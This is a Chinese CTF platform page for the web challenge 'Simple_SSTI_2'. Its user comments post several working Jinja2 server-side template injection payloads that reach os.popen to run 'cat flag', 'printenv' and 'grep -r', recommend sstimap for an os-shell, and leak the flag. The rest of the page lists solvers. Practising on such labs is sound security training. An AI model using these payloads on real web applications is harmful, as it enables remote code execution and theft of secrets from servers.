Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 16022
提  示:
描  述:
Simple_SSTI_2
评论
wywitkey 1月前

前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell

回复 0

HK1ng 3月前

详解:https://blog.csdn.net/m0_59527104/article/details/147013776

回复 3

smtall 3月前

flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}

回复 0

hao7 7月前

?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}

回复 1

超爱西西鸭 10月前

/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}

回复 1

pettter 11月前

?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}

回复 1

不会写代码的菜鸟 1年前

大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀

回复 1
qingchuan 11月前

因为没有import os,os是未定义的

回复 4

q1152874733 1年前

http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}

回复 0

Royic 1年前

/?flag={{config.__class__.__init__.__globals__['os'].popen('grep -r flag{ ./').read()}}

回复 0

sz007 1年前

flag{6c85015e98aa08e245d15289704dfd8b}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

18396143720 攻破了该题 3天前
sssqh 攻破了该题 3天前
safeline 攻破了该题 5天前
a1451753998 攻破了该题 7天前
Jiangzuo 攻破了该题 7天前
贺淑敏 攻破了该题 9天前
小敏bebe 攻破了该题 9天前
Hehe0619 攻破了该题 9天前
merrymu 攻破了该题 11天前
大棕兔爸爸 攻破了该题 12天前
qidianzhi 攻破了该题 13天前
julianus 攻破了该题 13天前
网络安全亮 攻破了该题 13天前
叶南山L 攻破了该题 14天前
跃迁ctfer 攻破了该题 15天前
maomaoht 攻破了该题 18天前
aaaaab 攻破了该题 18天前
2606579533 攻破了该题 20天前
千机www 攻破了该题 21天前
NNuuNN 攻破了该题 23天前
问题反馈